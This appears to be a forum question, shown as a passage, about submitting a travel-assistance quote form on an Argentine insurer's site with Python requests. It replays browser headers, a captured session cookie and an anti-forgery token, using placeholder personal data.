    'NumeroTelefono': 9997777,
    'dr': "",
    'cn': '(direct)',
    'cs': '(direct)',
    'cm': '(none)',
    'ck': '(not set 5)',
    'cc': '(not set 5)',
    'ua': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
    'ref': 'ar.ec.universal-assistance.com',
    'sr': '1366x768',
    'vp': '1366x728',
}
# Submit the form and show the returned page.
resp = requests.post(url, data=data)
print(resp.text)
And I tried:
import requests
# Quote form endpoint.
url = 'https://ar.ec.universal-assistance.com/cotizar-asistencia-al-viajero'
# Request headers copied from the browser. Left out on purpose:
#   - the ":authority" / ":method" / ":path" / ":scheme" entries, which are
#     HTTP/2 pseudo-headers and not valid header names for requests;
#   - "content-length", which requests computes from the encoded body.
# Every value is a string (requests rejects non-string header values).
header = {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
    "accept-encoding": "gzip, deflate, br",
    "accept-language": "es-ES,es;q=0.9",
    "cache-control": "max-age=0",
    "content-type": "application/x-www-form-urlencoded",
    "cookie": "__cfduid=db577552fb94c6b34d51ff081f56060601559763003; _ga=GA1.2.1051767382.1559763017; _fbp=fb.1.1559763016835.1821187230; ASP.NET_SessionId=zirpp0zdbsvt4p102zvfknic; __RequestVerificationToken=RuGNfaFUJxBI4FDOaVsMJBdBNwbqzUt_AMjdUu6Am3T6kpBrZ5__wM8CiDO3Ttw6z6iBseVrGvzsyD-GCoWI2XRuhHpJB3-qu7qXvjoDu3NQL6onXupDL1E4ZkUXuHpDSPi0mjQ7F5PSFf2l_SGtDA2; _gid=GA1.2.1308535569.1560799988; _gat=1",
    "origin": "https://ar.ec.universal-assistance.com",
    "referer": "https://ar.ec.universal-assistance.com/cotizar-asistencia-al-viajero",
    "upgrade-insecure-requests": "1",
    "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
}
# NOTE(review): the verification token below and the cookie above are values
# captured from one browser session; presumably the server only accepts a
# matching, still-valid pair - confirm, and fetch fresh ones if needed.
data = {
    '__RequestVerificationToken':'QWsTn0wqFmW9_jFfaBuuOjaWM4TE2Xk1XGn-oDTp0TENBO725YSkGnK8WeiAN53-jiPnjTDJ6zbZQjb6SzpprdCT4OlJg9jjZJKx1Wh7fGkZ5yCLkArUWCp6AIwq0t12gsonhP3orHzFJ2_1YqvIfJMcnzn2aXCb1-ZrDOzHM701',
    'CCTLD':'.ar',
    'CodigoOrganizacion':"",
    'CodigoConvenio':"",
    'OcultarTipoViaje':'false',
    'CantidadPasajeros':1,
    'CantidadDias':3,
    'Origen':'ARGENTINA',
    'Destino':'Centro america/Caribe',
    'TipoViaje':'Un viaje',
    'FechaInicio':'20/06/2019',
    'FechaFin':'22/06/2019',
    'Edad1':27,
    'Edad2':"",
    'Edad3':"",
    'Edad4':"",
    'Edad5':"",
    'Edad6':"",
    'Edad7':"",
    'Edad8':"",
    'Edad9':"",
    'Edad10':"",
    'Email':'no#no.com',
    'Nombre':'PEDRO',
    'Apellido':'PEREZ',
    'CodigoArea':800,
    'NumeroTelefono':9997777,
    'dr':"",
    'cn':'(direct)',
    'cs':'(direct)',
    'cm':'(none)',
    'ck':'(not set 5)',
    'cc':'(not set 5)',
    'ua':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
    'ref':'ar.ec.universal-assistance.com',
    'sr':'1366x768',
    'vp':'1366x728'
}
# The headers are sent along with the form data.
resp = requests.post(url=url, headers=header, data=data)
print(resp.text)
I expect the HTML of "https://ar.ec.universal-assistance.com/ofertas-asistencia-al-viajero".
That would be the next page after the first URL.

Categories

Resources